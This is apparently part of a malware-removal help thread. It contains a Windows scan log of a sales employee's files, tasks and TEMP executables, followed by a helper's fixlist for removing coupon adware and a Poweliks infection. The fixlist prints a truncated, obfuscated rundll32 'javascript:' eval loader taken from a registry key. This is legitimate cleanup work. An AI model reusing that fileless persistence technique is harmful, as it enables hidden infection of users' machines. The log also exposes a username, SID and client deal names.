2014-11-14 11:16 - 2014-11-14 11:16 - 02476596 _____ (Trend Micro Inc.) C:\Users\hstagner\Downloads\HousecallLauncher64.exe
2014-11-13 15:52 - 2014-11-13 15:52 - 00016024 _____ () C:\Users\hstagner\Downloads\thinkASG - Sharp - 454789r4 - 3YR 24x7 (1).htm
2014-11-13 15:20 - 2014-11-13 15:20 - 00309760 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT_DOUG SHARP XIV 325TB X2 _SVC 500TB LIC OPTION NOV 2014.xls
2014-11-13 15:17 - 2014-11-13 15:17 - 00257536 _____ () C:\Users\hstagner\Downloads\454789R4 Sharp 15 mod XIVs.xls
2014-11-13 14:47 - 2014-11-13 14:47 - 00030208 _____ () C:\Users\hstagner\Downloads\121312 Account Win Plan 09-19-12 (2).xls
2014-11-13 13:22 - 2014-11-13 13:22 - 00091648 _____ () C:\Users\hstagner\Downloads\Paciolan Quote Worksheet_SF Draft_11Nov2014_INTERNAL.xls
2014-11-13 13:18 - 2014-11-13 13:18 - 00266752 _____ () C:\Users\hstagner\Downloads\CostCovrSales435992R00 (1).xls
2014-11-13 11:37 - 2014-11-13 11:37 - 00016024 _____ () C:\Users\hstagner\Downloads\thinkASG - Sharp - 454789r4 - 3YR 24x7.htm
2014-11-13 10:46 - 2014-11-13 10:46 - 00307200 _____ () C:\Users\hstagner\Downloads\DEAL SHEET _ DRAFT DOUG FRESH AND EASY P8 NOV 2014.xls
2014-11-13 10:45 - 2014-11-13 10:45 - 00282112 _____ () C:\Users\hstagner\Downloads\435992R1 Fresh and Easy.xls
2014-11-13 10:31 - 2014-11-13 10:31 - 00019641 _____ () C:\Users\hstagner\Downloads\thinkASG - Unknown - 435992r1 - 3YR 24x7.htm
2014-11-12 17:29 - 2014-11-12 17:29 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-11-12 15:35 - 2014-11-12 15:35 - 00015589 _____ () C:\Users\hstagner\Downloads\thinkASG - Waxie - 460250r0 - 3YR 24x7.htm
2014-11-12 13:56 - 2014-11-12 13:56 - 00586240 _____ () C:\Users\hstagner\Downloads\TOM GE M&C UPGRADE 9179 SN EFA9P 1 PROC 40GB 2014 VS 2015.xls
2014-11-12 13:56 - 2014-11-12 13:56 - 00585216 _____ () C:\Users\hstagner\Downloads\TOM GE M&C UPGRADE 9179s TO P7+ 2014 VS 2015.xls
2014-11-12 13:17 - 2014-11-12 13:17 - 00587264 _____ () C:\Users\hstagner\Downloads\DOUG OMNITRAC ADAM AND MILLY BUDGETARY purchase of 2015 vs 2014.xls
2014-11-12 12:37 - 2014-11-12 12:37 - 00182272 _____ () C:\Users\hstagner\Downloads\459679R0 Pharmavite N3150 sn 13-E0372.xls
2014-11-12 12:37 - 2014-11-12 12:37 - 00182272 _____ () C:\Users\hstagner\Downloads\459678R0 Pharmavite N3220 sn 13-60500.xls
2014-11-12 12:36 - 2014-11-12 12:36 - 00182272 _____ () C:\Users\hstagner\Downloads\459676R0 Pharmavite N3150 sn 13-E6466.xls
2014-11-12 12:31 - 2014-11-12 12:31 - 00182272 _____ () C:\Users\hstagner\Downloads\459677R0 Pharmavite N3150 sn 13E1607.xls
2014-11-12 11:15 - 2014-11-12 11:15 - 00016024 _____ () C:\Users\hstagner\Downloads\A8B7JX.htm
2014-11-12 11:13 - 2014-11-12 11:13 - 00308224 _____ () C:\Users\hstagner\Downloads\DOUG SHARP XIV 254TB X2 _SVC 500TB LIC OPTION NOV 2014 (1).xls
2014-11-12 10:36 - 2014-11-12 10:36 - 00225792 _____ () C:\Users\hstagner\Downloads\459824R1 9179 sn EFA9P proc and 40gb memory (1).xls
2014-11-12 10:08 - 2014-11-12 10:08 - 00053735 _____ () C:\Users\hstagner\Downloads\14315b1-02a SCSS - Omnitracs - P8 server for DEV (1).xlsx
2014-11-12 10:07 - 2014-11-12 10:07 - 00053735 _____ () C:\Users\hstagner\Downloads\14315b1-02a SCSS - Omnitracs - P8 server for DEV.xlsx
2014-11-12 09:01 - 2014-11-12 09:01 - 00053268 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (31).xlsx
2014-11-11 15:33 - 2014-11-11 15:33 - 00032860 _____ () C:\Users\hstagner\Downloads\thinkASG - Sharp - 454789r1 - 3YR 24x7 (1).htm
2014-11-11 15:06 - 2014-11-11 15:06 - 00307712 _____ () C:\Users\hstagner\Downloads\DOUG SHARP XIV 254TB X2 _SVC 500TB LIC OPTION NOV 2014.xls
2014-11-11 15:06 - 2014-11-11 15:06 - 00257536 _____ () C:\Users\hstagner\Downloads\454789R2 Sharp XIV and SVC.xls
2014-11-11 14:19 - 2014-11-11 14:19 - 00053917 _____ () C:\Users\hstagner\Downloads\14315b1-01a SCSS - Omnitracs - P8 server for DEV.xlsx
2014-11-11 12:39 - 2014-11-11 12:39 - 00196096 _____ () C:\Users\hstagner\Downloads\457694R0 Linux inject for Omnitracs.xls
2014-11-11 10:03 - 2014-11-11 10:03 - 00306688 _____ () C:\Users\hstagner\Downloads\DEAL SHEET _DRAFT _DOUG OMNITRAC ADAM AND MILLY BUDGETARY AUG 2014 (3).xls
2014-11-11 09:58 - 2014-11-11 09:58 - 00306688 _____ () C:\Users\hstagner\Downloads\DEAL SHEET _DRAFT _DOUG OMNITRAC ADAM AND MILLY BUDGETARY AUG 2014 (2).xls
2014-11-11 09:35 - 2014-11-11 09:35 - 00306176 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT_ TOM GE M&C UPGRADE 9179 SN EFA9P 1 PROC 40GB NOV 2014 (1).xls
2014-11-10 16:39 - 2014-11-10 16:39 - 00014161 _____ () C:\Users\hstagner\Downloads\459824r1 ANB0G3 - spec change for 9179 sn#efa9p.htm
2014-11-10 16:38 - 2014-11-10 16:38 - 00305664 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT_ TOM GE M&C UPGRADE 9179 SN EFA9P 1 PROC 40GB NOV 2014.xls
2014-11-10 16:38 - 2014-11-10 16:38 - 00234496 _____ () C:\Users\hstagner\Downloads\459824R1 9179 sn EFA9P proc and 40gb memory.xls
2014-11-10 13:44 - 2014-11-10 13:44 - 00299520 _____ () C:\Users\hstagner\Downloads\449261R7 Omnitracs 4way (2).xls
2014-11-10 11:54 - 2014-11-10 11:54 - 00178176 _____ () C:\Users\hstagner\Downloads\sales_quote_1107TSS04 (1).xls
2014-11-10 11:51 - 2014-11-10 11:51 - 00178176 _____ () C:\Users\hstagner\Downloads\sales_quote_1107TSS04.xls
2014-11-07 17:05 - 2014-11-07 17:05 - 00305664 _____ () C:\Users\hstagner\Downloads\DOUG SHARP XIV AND SVC OPTION NOV 2014.xls
2014-11-07 16:59 - 2014-11-07 16:59 - 00032860 _____ () C:\Users\hstagner\Downloads\thinkASG - Sharp - 454789r1 - 3YR 24x7.htm
2014-11-07 16:44 - 2014-11-07 16:44 - 01977344 _____ () C:\Users\hstagner\Downloads\TOM GE dealsheets for Dec 2013 to Nov 2014.xls
2014-11-07 13:13 - 2014-11-07 13:13 - 00111107 _____ () C:\Users\hstagner\Downloads\ANB4JC (4).htm
2014-11-07 12:44 - 2014-11-07 12:44 - 00012819 _____ () C:\Users\hstagner\Downloads\AZB604 (2).htm
2014-11-06 11:48 - 2014-11-06 11:48 - 00111107 _____ () C:\Users\hstagner\Downloads\ANB4JC (3).htm
2014-11-06 10:29 - 2014-11-06 10:29 - 00299520 _____ () C:\Users\hstagner\Downloads\449261R7 Omnitracs 4way (1).xls
2014-11-06 10:18 - 2014-11-06 10:18 - 00305664 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT_ TOM GE M&C PROTECTTIER UPGRADE NOV 2014 (1).xls
2014-11-06 10:16 - 2014-11-06 10:16 - 00106428 _____ () C:\Users\hstagner\Downloads\ANB4JC (2).htm
2014-11-06 10:14 - 2014-11-06 10:14 - 00106428 _____ () C:\Users\hstagner\Downloads\ANB4JC (1).htm
2014-11-06 10:14 - 2014-11-06 10:14 - 00012819 _____ () C:\Users\hstagner\Downloads\AZB604.htm
2014-11-06 10:14 - 2014-11-06 10:14 - 00012819 _____ () C:\Users\hstagner\Downloads\AZB604 (1).htm
2014-11-06 09:53 - 2014-11-06 09:53 - 00425324 _____ () C:\Users\hstagner\Downloads\vm-20141105193722062714-ccbd0e6a5d6d36593b9a8a8749215aad.wav
2014-11-06 08:01 - 2014-11-06 08:01 - 00000000 ____D () C:\Users\Default\AppData\Local\Google
2014-11-06 08:01 - 2014-11-06 08:01 - 00000000 ____D () C:\Users\Default User\AppData\Local\Google
2014-11-05 08:31 - 2014-11-05 08:31 - 00046596 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (30).xlsx
2014-11-04 16:59 - 2014-11-04 17:00 - 00012819 _____ () C:\Users\hstagner\Downloads\ANB4JC.htm
2014-11-04 13:48 - 2014-11-04 13:48 - 00201216 _____ () C:\Users\hstagner\Downloads\457273R0 GE M&C Alph.xls
2014-11-04 13:44 - 2014-11-04 13:44 - 00209408 _____ () C:\Users\hstagner\Downloads\457272R0 GE M&C Mason PTT.xls
2014-11-04 13:44 - 2014-11-04 13:44 - 00209408 _____ () C:\Users\hstagner\Downloads\457272R0 GE M&C Mason PTT (1).xls
2014-11-04 13:43 - 2014-11-04 13:43 - 00305152 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT_ TOM GE M&C PROTECTTIER UPGRADE NOV 2014.xls
2014-11-04 11:09 - 2014-11-04 11:09 - 00312135 _____ () C:\Users\hstagner\Downloads\11-3-14 ASG- Petco Animal Supplies.xlsx
2014-11-03 16:55 - 2014-11-03 16:55 - 00242124 _____ () C:\Users\hstagner\Downloads\vm-20141103215500017350-ccbd0e6a5d6d36593b9a8a8749215aad.wav
2014-11-03 14:29 - 2014-11-03 14:29 - 00011149 _____ () C:\Users\hstagner\Downloads\ASG - GE - Replacement SVCs - Merge to A5BVG6  (2).htm
2014-11-03 10:30 - 2014-11-03 10:30 - 00037586 _____ () C:\Users\hstagner\Downloads\thinkASG - Sharp - 458049r2 - 3YR 24x7.htm
2014-11-03 10:20 - 2014-11-03 10:20 - 00017901 _____ () C:\Users\hstagner\Downloads\thinkASG - Sonic - 458008r0 - 3YR 24x7.htm
2014-11-03 09:23 - 2014-11-03 09:24 - 00049337 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (29).xlsx
2014-10-31 15:26 - 2014-10-31 15:26 - 00309760 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT DOUG SHARP SVC_v7000_v840 NOV 2014.xls
2014-10-31 15:02 - 2014-10-31 15:02 - 00003273 _____ () C:\Users\hstagner\Downloads\isat.jnlp
2014-10-31 12:22 - 2014-10-31 12:22 - 00011149 _____ () C:\Users\hstagner\Downloads\ASG - GE - Replacement SVCs - Merge to A5BVG6  (1).htm
2014-10-31 11:50 - 2014-10-31 11:50 - 00336896 _____ () C:\Users\hstagner\Downloads\GE 820_Relo Form.xls
2014-10-30 14:27 - 2014-10-30 14:27 - 00010755 _____ () C:\Users\hstagner\Downloads\Garner Travel Information.xlsx
2014-10-30 13:54 - 2014-10-30 13:54 - 00330752 _____ () C:\Users\hstagner\Downloads\GE 820 thinkASG_2011_Relocation_Form (2).xls
2014-10-30 13:43 - 2014-10-30 13:43 - 00330752 _____ () C:\Users\hstagner\Downloads\GE 820 thinkASG_2011_Relocation_Form (1).xls
2014-10-30 11:40 - 2014-10-30 11:40 - 00297984 _____ () C:\Users\hstagner\Downloads\449261R7 Omnitracs 4way.xls
2014-10-30 08:52 - 2014-10-30 08:53 - 00305664 _____ () C:\Users\hstagner\Downloads\DEAL SHEET _DRAFT _DOUG OMNITRAC ADAM AND MILLY BUDGETARY AUG 2014 (1).xls
2014-10-30 08:04 - 2014-10-30 08:04 - 00010446 _____ () C:\Users\hstagner\Downloads\Travel Information Template (1).xlsx
2014-10-29 16:37 - 2014-10-29 16:37 - 00010446 _____ () C:\Users\hstagner\Downloads\Travel Information Template.xlsx
2014-10-29 16:31 - 2014-10-29 16:31 - 08387494 _____ () C:\Users\hstagner\Downloads\mds-shellshock-1.0.gz
2014-10-29 09:57 - 2014-10-29 09:57 - 00238691 _____ () C:\Users\hstagner\Downloads\10-28-14 ASG- Omnitracs.xlsx
2014-10-29 09:49 - 2014-10-29 09:49 - 00238516 _____ () C:\Users\hstagner\Downloads\10-27-14 ASG- Omnitracs (1).xlsx
2014-10-29 08:51 - 2014-10-29 08:51 - 00316928 _____ () C:\Users\hstagner\Downloads\CostCovrSales449261R07.xls
2014-10-28 16:21 - 2014-10-28 16:21 - 00330752 _____ () C:\Users\hstagner\Downloads\GE 820 thinkASG_2011_Relocation_Form.xls
2014-10-28 14:44 - 2014-10-28 14:44 - 00095884 _____ () C:\Users\hstagner\Downloads\vm-20141028193652016455-ccbd0e6a5d6d36593b9a8a8749215aad.wav
2014-10-28 09:15 - 2014-10-28 09:15 - 00013676 _____ () C:\Users\hstagner\Downloads\AM0W01 8x5.htm
2014-10-28 09:14 - 2014-10-28 09:14 - 00019558 _____ () C:\Users\hstagner\Downloads\AM0W01.htm
2014-10-28 08:04 - 2014-10-28 08:04 - 00049782 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (28).xlsx
2014-10-27 15:31 - 2014-10-27 15:31 - 00318464 _____ () C:\Users\hstagner\Downloads\CostCovrSales449261R06 (2).xls
2014-10-27 15:13 - 2014-10-27 15:13 - 00310784 _____ () C:\Users\hstagner\Downloads\DOUG Omnitracs small p8 vs upgrade to free machine Sept 2014 (4).xls
2014-10-27 14:29 - 2014-10-27 14:29 - 00318464 _____ () C:\Users\hstagner\Downloads\CostCovrSales449261R06 (1).xls
2014-10-27 13:48 - 2014-10-27 13:49 - 00020600 _____ () C:\Users\hstagner\Downloads\APBFQ9 (4).htm
2014-10-27 13:10 - 2014-10-27 13:10 - 00308736 _____ () C:\Users\hstagner\Downloads\DOUG Omnitracs small p8 vs upgrade to free machine Sept 2014 (3).xls
2014-10-27 13:07 - 2014-10-27 13:07 - 00252416 _____ () C:\Users\hstagner\Downloads\10-27-14 ASG- Omnitracs.xls
2014-10-27 13:06 - 2014-10-27 13:06 - 00238516 _____ () C:\Users\hstagner\Downloads\10-27-14 ASG- Omnitracs.xlsx
2014-10-27 12:16 - 2014-10-27 12:16 - 00183296 _____ () C:\Users\hstagner\Downloads\CostCovrSales457164R00.xls
2014-10-27 12:06 - 2014-10-27 12:06 - 00317952 _____ () C:\Users\hstagner\Downloads\CostCovrSales449261R06.xls
2014-10-27 11:02 - 2014-10-27 11:02 - 00187244 _____ () C:\Users\hstagner\Downloads\vm-20141027160227064355-ccbd0e6a5d6d36593b9a8a8749215aad (1).wav
2014-10-27 11:01 - 2014-10-27 11:01 - 00187244 _____ () C:\Users\hstagner\Downloads\vm-20141027160227064355-ccbd0e6a5d6d36593b9a8a8749215aad.wav
2014-10-27 09:12 - 2014-10-27 09:12 - 00315392 _____ () C:\Users\hstagner\Downloads\CostCovrSales449261R04.xls
2014-10-24 11:09 - 2014-10-24 11:09 - 00019689 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (27).xlsx
2014-10-23 11:51 - 2014-11-14 11:02 - 00000000 ___RD () C:\Users\hstagner\Google Drive
2014-10-23 11:51 - 2014-10-23 11:51 - 00001675 _____ () C:\Users\hstagner\Desktop\Google Drive.lnk
2014-10-23 11:50 - 2014-11-06 08:01 - 00002053 _____ () C:\Users\Public\Desktop\Google Slides.lnk
2014-10-23 11:50 - 2014-11-06 08:01 - 00002051 _____ () C:\Users\Public\Desktop\Google Sheets.lnk
2014-10-23 11:50 - 2014-11-06 08:01 - 00002041 _____ () C:\Users\Public\Desktop\Google Docs.lnk
2014-10-23 11:50 - 2014-11-06 08:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-10-23 10:59 - 2014-10-23 10:59 - 00229888 _____ () C:\Users\hstagner\Downloads\455735R0 GE power8 server (1).xls
2014-10-23 10:46 - 2014-10-23 10:46 - 00308224 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT _TOM GE M&C SVC and V840 SEPT_ OCT 2014 (5).xls
2014-10-23 09:48 - 2014-10-23 09:48 - 00036323 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (26).xlsx
2014-10-23 09:48 - 2014-10-23 09:48 - 00025403 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (25).xlsx
2014-10-23 09:47 - 2014-10-23 09:47 - 00019440 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (24).xlsx
2014-10-22 17:04 - 2014-10-22 17:04 - 00054049 _____ () C:\Users\hstagner\Downloads\14295b1-01a SCSS - GE - DEV SVC & Flash.xlsx
2014-10-22 16:12 - 2014-10-22 16:12 - 00023080 _____ () C:\Users\hstagner\Downloads\GE_450525r0_AP9LJ3 (1).htm
2014-10-22 16:11 - 2014-10-22 16:11 - 00033517 _____ () C:\Users\hstagner\Downloads\GE_450526r0_AN9LJ8.htm
2014-10-22 16:11 - 2014-10-22 16:11 - 00023080 _____ () C:\Users\hstagner\Downloads\GE_450525r0_AP9LJ3.htm
2014-10-22 16:06 - 2014-10-22 16:06 - 00023080 _____ () C:\Users\hstagner\Downloads\450525r1_AP9LJ3 GE maint (1).htm
2014-10-22 15:11 - 2014-10-22 15:11 - 00202752 _____ () C:\Users\hstagner\Downloads\CostCovrSales430756R02.xls
2014-10-22 14:54 - 2014-10-22 14:54 - 00312320 _____ () C:\Users\hstagner\Downloads\Tech Data Contact Sheet 2014.ppt
2014-10-22 14:30 - 2014-10-22 14:30 - 00185856 _____ () C:\Users\hstagner\Downloads\CostCovrSales456652R00.xls
2014-10-22 12:59 - 2014-10-28 12:02 - 00000000 ____D () C:\Users\hstagner\AppData\Local\WebEx
2014-10-22 12:58 - 2014-10-22 12:58 - 00631744 _____ (Cisco WebEx LLC) C:\Users\hstagner\Downloads\Cisco_WebEx_Add-On.exe
2014-10-22 11:42 - 2014-10-22 11:43 - 00182784 _____ () C:\Users\hstagner\Downloads\CostCovrSales454950R00 (2).xls
2014-10-22 11:11 - 2014-10-22 11:11 - 00000000 _____ () C:\DAC_ELIST
2014-10-22 09:01 - 2014-10-22 09:01 - 00308289 _____ () C:\Users\hstagner\Downloads\10-21-14 ASG- Omnitracs (1).xlsx
2014-10-21 15:44 - 2014-10-21 15:45 - 00308224 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT _TOM GE M&C SVC and V840 SEPT_ OCT 2014 (4).xls
2014-10-21 14:53 - 2014-10-21 14:53 - 00308289 _____ () C:\Users\hstagner\Downloads\10-21-14 ASG- Omnitracs.xlsx
2014-10-21 14:40 - 2014-10-21 14:40 - 00212992 _____ () C:\Users\hstagner\Downloads\CostCovrSales456188R01.xls
2014-10-21 13:48 - 2014-10-21 13:48 - 00187392 _____ () C:\Users\hstagner\Downloads\CostCovrSales454950R00 (1).xls
2014-10-21 13:45 - 2014-10-21 13:45 - 00187392 _____ () C:\Users\hstagner\Downloads\CostCovrSales454950R00.xls
2014-10-21 08:48 - 2014-10-21 08:48 - 00185856 _____ () C:\Users\hstagner\Downloads\CostCovrSales456052R00.xls
2014-10-21 08:16 - 2014-10-21 08:16 - 00240640 _____ () C:\Users\hstagner\Downloads\CostCovrSales455735R00 (1).xls
2014-10-20 15:33 - 2014-10-20 15:33 - 00325644 _____ () C:\Users\hstagner\Downloads\vm-20141020203250064089-ccbd0e6a5d6d36593b9a8a8749215aad.wav
2014-10-20 12:30 - 2014-10-20 12:30 - 00305152 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT _DOUG OMNITRACS UPGRADE TO XIV OCT 2014.xls
2014-10-20 10:31 - 2014-10-20 10:31 - 01049088 _____ () C:\Users\hstagner\Downloads\BP Offering Release 47P Education 10.22.2014..ppt
2014-10-20 09:51 - 2014-10-20 09:51 - 00240640 _____ () C:\Users\hstagner\Downloads\CostCovrSales455735R00.xls
2014-10-17 13:59 - 2014-10-17 13:59 - 00305152 _____ () C:\Users\hstagner\Downloads\DOUG OMNITRACS UPGRADE TO XIV OCT 2014.xls
2014-10-17 13:59 - 2014-10-17 13:59 - 00183808 _____ () C:\Users\hstagner\Downloads\454899R0 Omnitracs XIV upgrade.xls
2014-10-17 13:13 - 2014-10-17 13:13 - 00034304 _____ () C:\Users\hstagner\Downloads\timeoffhstagner (1).xls
2014-10-17 09:45 - 2014-10-17 09:45 - 00276480 _____ () C:\Users\hstagner\Downloads\GE M&C IVO VS BID PRICING ON SVC_FLASH_POWER OCT 2014.xls
2014-10-17 08:22 - 2014-10-17 08:22 - 00011149 _____ () C:\Users\hstagner\Downloads\ASG - GE - Replacement SVCs - Merge to A5BVG6 .htm
2014-10-16 15:44 - 2014-10-16 15:44 - 00307712 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT _TOM GE M&C SVC and V840 SEPT_ OCT 2014 (3).xls
2014-10-16 15:38 - 2014-10-16 15:38 - 00230400 _____ () C:\Users\hstagner\Downloads\455735R0 GE power8 server.xls
2014-10-16 15:32 - 2014-10-16 15:32 - 00314880 _____ () C:\Users\hstagner\Downloads\DEAL SHEET_ DRAFT TOM GE M&C STORAGE JULY 2014 PHASE 2.xls
2014-10-16 15:28 - 2014-10-16 15:28 - 00015097 _____ () C:\Users\hstagner\Downloads\thinkASG - GE - 455735r0 - 3YR 24x7.htm
2014-10-16 13:43 - 2014-10-16 13:44 - 00185856 _____ () C:\Users\hstagner\Downloads\455681R0 GE SVC upgrade.xls
2014-10-16 11:06 - 2014-10-16 11:06 - 00238678 _____ () C:\Users\hstagner\Downloads\10-15-14 ASG- Omnitracs (2).xlsx
2014-10-16 08:25 - 2014-10-16 08:25 - 00019070 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (23).xlsx
2014-10-15 16:23 - 2014-10-15 16:24 - 00238678 _____ () C:\Users\hstagner\Downloads\10-15-14 ASG- Omnitracs (1).xlsx
2014-10-15 16:13 - 2014-10-15 16:13 - 00238678 _____ () C:\Users\hstagner\Downloads\10-15-14 ASG- Omnitracs.xlsx
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-14 12:51 - 2011-12-09 17:00 - 00000000 ____D () C:\ProgramData\TEMP
2014-11-14 12:47 - 2011-12-10 05:44 - 00000466 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-11-14 12:44 - 2011-10-04 15:03 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-14 12:43 - 2012-04-11 15:39 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-14 12:43 - 2011-12-10 05:44 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-11-14 12:42 - 2014-06-30 13:39 - 00000000 ____D () C:\Windows\SysWOW64\aamdata
2014-11-14 12:42 - 2012-04-26 10:27 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-11-14 12:09 - 2012-11-08 16:54 - 00000920 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131UA.job
2014-11-14 11:53 - 2014-05-07 15:26 - 00000580 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2926875163-4226794389-2330185411-1131.job
2014-11-14 11:35 - 2014-03-24 10:58 - 00023196 _____ () C:\Windows\TMFilter.log
2014-11-14 11:08 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-14 11:08 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-14 11:06 - 2009-07-14 00:13 - 01081288 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-14 11:04 - 2012-01-26 13:13 - 00000000 ____D () C:\Users\hstagner\AppData\Local\Digsby
2014-11-14 11:04 - 2011-10-04 15:01 - 01159220 _____ () C:\Windows\WindowsUpdate.log
2014-11-14 11:02 - 2011-10-04 15:03 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-14 11:01 - 2012-01-25 14:19 - 00000000 ____D () C:\adsm.sys
2014-11-14 11:00 - 2012-05-21 11:52 - 00054510 _____ () C:\Windows\setupact.log
2014-11-14 11:00 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-14 09:09 - 2012-11-08 16:54 - 00000868 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131Core.job
2014-11-14 07:39 - 2011-10-04 15:03 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-11-14 07:39 - 2011-10-04 15:03 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-11-13 09:04 - 2012-11-08 16:54 - 00003896 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131UA
2014-11-13 09:04 - 2012-11-08 16:54 - 00003500 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131Core
2014-11-04 14:30 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-29 08:48 - 2014-05-07 15:26 - 00003604 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-2926875163-4226794389-2330185411-1131
2014-10-28 12:20 - 2012-01-26 12:44 - 00000000 __SHD () C:\Users\hstagner\Documents\cache
2014-10-28 12:02 - 2012-04-06 10:31 - 00000000 ____D () C:\ProgramData\WebEx
2014-10-25 14:51 - 2013-03-25 11:18 - 00000000 _____ () C:\Windows\system32\DAC_ELIST
2014-10-23 11:51 - 2012-01-26 12:08 - 00000000 ____D () C:\Users\hstagner
2014-10-23 11:50 - 2012-01-26 12:50 - 00000000 ____D () C:\Users\hstagner\AppData\Local\Google
2014-10-23 11:50 - 2011-10-04 15:03 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-21 15:41 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-20 13:33 - 2013-09-19 11:05 - 00000000 ____D () C:\Program Files\CrashPlan
 
Some content of TEMP:
====================
C:\Users\hstagner\AppData\Local\Temp\Couponscom.exe
C:\Users\hstagner\AppData\Local\Temp\DefaultPack.exe
C:\Users\jmccullough\AppData\Local\Temp\ose00000.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-11-07 08:58
 
==================== End Of Log ============================
 

 



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 40,213 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:03:09 PM

Posted 19 November 2014 - 09:29 AM

 
Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below.
 
 
start
 
(Coupons.com Inc.) C:\Program Files (x86)\Coupons\CouponPrinterService.exe
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO-x32: TBSB07898 Class -> {FCBCCB87-9224-4B8D-B117-F56D924BEB18} -> C:\Program Files (x86)\Coupons.com CouponBar\tbcore3.dll ()
Toolbar: HKLM-x32 - Coupons.com CouponBar - {8660E5B3-6C41-44DE-8503-98D99BBECD41} - C:\Program Files (x86)\Coupons.com CouponBar\tbcore3.dll ()
FF Keyword.URL: hxxp://www.bing.com/search?FORM=U079DF&PC=U079&q=
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll (Coupons, Inc.)
FF SearchPlugin: C:\Users\hstagner\AppData\Roaming\Mozilla\Firefox\Profiles\wzygs4sr.default-1398197978032\searchplugins\bingp.xml
